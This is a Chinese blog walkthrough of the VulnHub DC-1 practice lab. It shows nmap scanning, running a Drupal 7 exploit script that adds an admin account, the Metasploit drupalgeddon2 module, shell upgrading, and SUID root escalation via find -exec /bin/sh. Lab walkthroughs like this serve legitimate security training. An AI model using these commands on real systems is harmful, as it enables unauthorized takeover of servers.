VulnHub DC-1

复制代码
🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、信息收集

1.nmap扫描

php 复制代码
发现开放了22算口,开放了ssh服务,OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务

打开80端口:

二、漏洞利用

1.searchsploit

cs 复制代码
┌──(root💀kali)-[~/routing]
└─# searchsploit Drupa 7 

有一个34992.py文件可以添加管理员账户
cs 复制代码
┌──(root💀kali)-[~/routing]
└─# searchsploit -m 34992.py

复制到文件夹

不建议在本地的漏洞数据库中修改exp,建议使用-m参数复制那些有用的到当前的工作目录
cs 复制代码
┌──(root💀kali)-[~/routing/Drupal 7]
└─# python 34992.py -t http://192.168.103.188/ -u root -p root

-t 接url   -u 用户名    -p 密码

2.flag3

3.msf

cs 复制代码
msf6 > search Drupal 7

使用exploit/unix/webapp/drupal_drupalgeddon2模块

set rhosts 192.168.103.188

python -c 'import pty; pty.spawn("/bin/bash")'  #交互式shell

4.SUID提权

cs 复制代码
1.查看具有SUID的二进制可执行文件
find / -user root -perm -4000 -print 2>/dev/null

2.一些常用的可以用来提权的可执行文件:
nmap、vim、find、bash、more、less、nano、cp

3.利用find获得root权限
find / -name 已有文件名 -exec "/bin/sh" \;
比如:
find / -name misc -exec "/bin/sh" \;

5.flag

大致就是说你已经通过了本关卡

相关推荐
fengyehongWorld7 分钟前
Linux Docker的环境配置与简单使用
linux·运维·docker
炎码工坊27 分钟前
DevSecOps实践:CI/CD流水线集成动态安全测试(DAST)工具
安全·网络安全·微服务·云原生·安全架构
星融元asterfusion40 分钟前
突破AI瓶颈:基于实时感知的智能选路实现智算负载均衡优化
运维·人工智能·负载均衡
刘延林.1 小时前
树莓派5-ubuntu 24.04 安装 ros环境
linux·运维·ubuntu
DjangoJason1 小时前
计算机网络 : 数据链路层
网络·计算机网络
wei_work@2 小时前
【linux】简单的shell脚本练习
linux·运维·服务器
白总Server2 小时前
GaussDB 分布式数据库调优(架构到全链路优化)
java·网络·c++·架构·go·scala·数据库架构
XiaoCCCcCCccCcccC2 小时前
传输层协议 TCP 介绍 -- TCP协议格式,确认应答机制,超时重传机制,连接管理机制,滑动窗口,流量控制,拥塞控制,延迟应答,捎带应答
网络·网络协议·tcp/ip
我才是鳴海步2 小时前
基于docker技术的单主机环境模拟测试批量客户端
运维·docker·容器
我言秋日胜春朝★3 小时前
【Linux网络编程】基于udp套接字实现的网络通信
linux·网络·udp